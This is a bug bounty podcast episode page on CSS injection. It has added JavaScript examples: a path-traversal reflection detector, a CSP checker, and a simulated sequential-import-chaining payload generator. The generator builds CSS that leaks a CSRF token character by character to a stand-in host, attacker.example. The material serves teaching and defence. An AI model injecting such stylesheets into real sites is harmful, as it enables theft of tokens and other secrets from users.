
Critical Thinking - Bug Bounty Podcast Episode 79: The State of CSS Injection - Leaking Text Nodes & HTML Attributes
Jul 11, 2024

YTCracker, an artist acclaimed for his contributions to music in tech and gaming, joins the conversation on CSS injection techniques. They dissect the art of sequential import chaining and delve into font ligatures that can leak information. The discussion reveals sophisticated strategies for exploiting CSS vulnerabilities, highlighting methods for extracting HTML attributes. Tune in for insights on effective content security measures and the evolving landscape of web technologies, sprinkled with YTCracker's creative flair!
AI Snips
Automate Client-Side Path Traversal Detection
- When building tools for client-side path traversal, automate detection of reflected parameters and of query/hash values that end up inside the path of a subresource request.
- Use extensions or scanners to flag query/hash reflections that influence iframe, fetch, or asset paths, then probe those parameters with traversal sequences.
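As an added example (not from the podcast or its guests) of the detection logic described above: given the page URL and the subresource URLs it issued, report which query or hash values appear inside a resource path. The page URL, parameter names and resource list are constructed sample input; the length threshold and the decision to only inspect the path component are assumptions.

```javascript
// Added example: flag query/hash values that are reflected into the path of a
// subresource URL (iframe src, fetch target, script/image asset). Such a
// reflection is the precondition for client-side path traversal, where a value
// like "../../x" can redirect the request to a different endpoint.
// Sample input is constructed; minimum value length (3) is an assumption to
// avoid noise from short values such as "en".
function findPathInfluence(pageUrl, resourceUrls, minLength = 3) {
  const page = new URL(pageUrl);
  const sources = [];

  // Attacker-controllable inputs: every query parameter value and the fragment.
  for (const [name, value] of page.searchParams) {
    if (value.length >= minLength) sources.push({ kind: "query", name, value });
  }
  const fragment = decodeURIComponent(page.hash.slice(1));
  if (fragment.length >= minLength) sources.push({ kind: "hash", name: "#", value: fragment });

  const findings = [];
  for (const resource of resourceUrls) {
    // Relative resource URLs are resolved against the page, as the browser would.
    const u = new URL(resource, page);
    for (const s of sources) {
      const reflected =
        u.pathname.includes(s.value) || u.pathname.includes(encodeURIComponent(s.value));
      if (reflected) {
        findings.push({ resource: u.href, kind: s.kind, name: s.name, value: s.value });
      }
    }
  }
  return findings;
}

// Stand-alone run on constructed data: "alice" flows from ?user= into an API path.
if (typeof require !== "undefined" && require.main === module) {
  console.log(
    findPathInfluence("https://app.example/profile?user=alice&lang=en#tab=photos", [
      "/api/users/alice/avatar.png",
      "https://cdn.example/i18n/en.json",
      "/static/app.js",
    ])
  );
}
```

A hit means the next step is to replace the flagged value with a traversal sequence and watch whether the subresource request leaves its intended directory; the function only finds candidates, it does not confirm exploitability.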
Sequential Import Chaining Works For Attributes
- Modern CSS injection can leak HTML attributes and text nodes using chained imports and CSS selectors.
- Sequential import chaining allows character-by-character extraction via CSS attribute prefix selectors (`[value^="..."]`): each stage's `@import` fetches the next stylesheet, which the attacker's server serves only after the current stage has leaked a character.
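The following is an added example (not code from the podcast or its guests) that simulates the attribute leak described above. It generates one stage of the injected stylesheet for a known prefix and models the browser with a function that reports which prefix selector would match the real attribute value. The target element (`<input name="csrf" value="...">`), the alphabet, and the exfiltration origin `https://attacker.example` are assumptions; no network requests are made.

```javascript
// Added example: sequential import chaining with attribute prefix selectors.
// Assumptions: the secret sits in <input name="csrf" value="...">, the
// attacker's server is https://attacker.example (hypothetical), and the browser
// applies a stylesheet's rules before the @import it references has finished
// loading (the server stalls that import until a leak callback arrives).
const ALPHABET = "abcdef0123456789";
const ORIGIN = "https://attacker.example";

// One stage of the injected CSS: the @import for the next stage comes first
// (CSS requires @import before other rules), followed by one rule per
// candidate character. Exactly one rule can match, because the candidates
// differ in their last character, and its background URL leaks the guess.
function buildStage(knownPrefix, alphabet = ALPHABET, origin = ORIGIN) {
  const rules = [];
  for (const ch of alphabet) {
    const guess = knownPrefix + ch;
    rules.push(
      `input[name="csrf"][value^="${guess}"]{background:url(${origin}/leak?v=${encodeURIComponent(guess)})}`
    );
  }
  const nextStage = `@import url(${origin}/stage?prefix=${encodeURIComponent(knownPrefix)});`;
  return nextStage + "\n" + rules.join("\n");
}

// Stand-in for the browser: returns the guessed prefix whose selector matches
// the real attribute value, or null when no rule fires (value fully recovered,
// or the next character is outside the alphabet).
function simulateBrowser(stylesheet, actualValue) {
  const selector = /input\[name="csrf"\]\[value\^="([^"]*)"\]/g;
  let m;
  while ((m = selector.exec(stylesheet)) !== null) {
    if (m[1].length > 0 && actualValue.startsWith(m[1])) return m[1];
  }
  return null;
}

// Drive the chain: each leaked prefix seeds the next stage until nothing fires.
function extractValue(actualValue, maxLength = 64) {
  let known = "";
  let stages = 0;
  while (known.length < maxLength) {
    const css = buildStage(known);
    stages += 1;
    const leaked = simulateBrowser(css, actualValue);
    if (leaked === null) break; // no selector matched: stop here
    known = leaked;
  }
  return { value: known, stages };
}

// Stand-alone run on a constructed token value.
if (typeof require !== "undefined" && require.main === module) {
  console.log(extractValue("a3f9"));
}
```

Each stage costs one round trip and one stylesheet the size of the alphabet, so a 32-character hex token takes 33 stages; a character outside the alphabet stops the chain early, which is why the simulation of `"a3zz"` recovers only `"a3"`. The technique depends on the browser applying the current stage's rules while the stalled `@import` is still pending, which is a browser-specific behaviour worth verifying before relying on it.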
Use CSP To Block CSS Exfiltration
- Use a strict Content Security Policy (CSP) to block remote CSS imports and remote font loading, which also removes the image and font requests that serve as the exfiltration channel.
- Prevent CSS injection by disallowing untrusted stylesheet imports and font sources, and avoid `'unsafe-inline'` in `style-src` so an injected `<style>` block is not applied in the first place.
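As an added example (not from the podcast or its guests), a small checker for the CSP point above: it parses a policy header and reports whether the three directives a CSS exfiltration chain depends on (`style-src` for `@import`, `font-src` for fonts, `img-src` for background-image beacons) still admit arbitrary remote origins. The sample headers are constructed; the checker deliberately ignores `style-src-elem`/`style-src-attr`, nonces and hashes, which is an assumption stated in the code.

```javascript
// Added example: does a CSP confine the channels a CSS injection needs?
// Modelled directives: style-src (@import), font-src (font-face), img-src
// (background-image beacons). Not modelled (assumption): style-src-elem,
// style-src-attr, nonces, hashes and report-only mode.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Per CSP, a repeated directive is ignored: the first occurrence wins.
    if (!(name in directives)) directives[name] = tokens.slice(1);
  }
  return directives;
}

// Fetch directives fall back to default-src; with neither present the
// resource type is unrestricted, represented here as null.
function effectiveSources(directives, name) {
  if (name in directives) return directives[name];
  if ("default-src" in directives) return directives["default-src"];
  return null;
}

// Source expressions that let an attacker-chosen origin (or data: URL) through.
function permissiveSources(sources) {
  if (sources === null) return ["(directive absent)"];
  return sources.filter((s) => {
    const v = s.toLowerCase();
    return v === "*" || v === "https:" || v === "http:" || v === "data:" || v.includes("*");
  });
}

function assessCssExfil(header) {
  const d = parseCsp(header);
  const result = { permissive: {}, inlineStyles: false, blocksExfil: true };
  for (const dir of ["style-src", "font-src", "img-src"]) {
    const bad = permissiveSources(effectiveSources(d, dir));
    result.permissive[dir] = bad;
    if (bad.length > 0) result.blocksExfil = false;
  }
  // 'unsafe-inline' on style-src means an injected <style> block is applied at all.
  const styleSources = effectiveSources(d, "style-src") ?? [];
  result.inlineStyles = styleSources.some((s) => s.toLowerCase() === "'unsafe-inline'");
  return result;
}

// Constructed sample policies: a weak one beside a corrected one.
const WEAK_CSP = "default-src 'self'; style-src 'self' 'unsafe-inline' https:; img-src *";
const STRICT_CSP =
  "default-src 'none'; script-src 'self'; style-src 'self'; font-src 'self'; img-src 'self'; connect-src 'self'";

if (typeof require !== "undefined" && require.main === module) {
  console.log(assessCssExfil(WEAK_CSP));
  console.log(assessCssExfil(STRICT_CSP));
}
```

With `WEAK_CSP`, `https:` in `style-src` lets the injected stylesheet `@import` the attacker's next stage and `img-src *` lets the prefix-selector beacon out; `font-src` inherits `'self'` from `default-src` and is fine. `STRICT_CSP` closes all three. A policy with `'self'` everywhere still does not help if the attacker can plant a stylesheet or read request logs on the same origin, so the check is necessary rather than sufficient.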

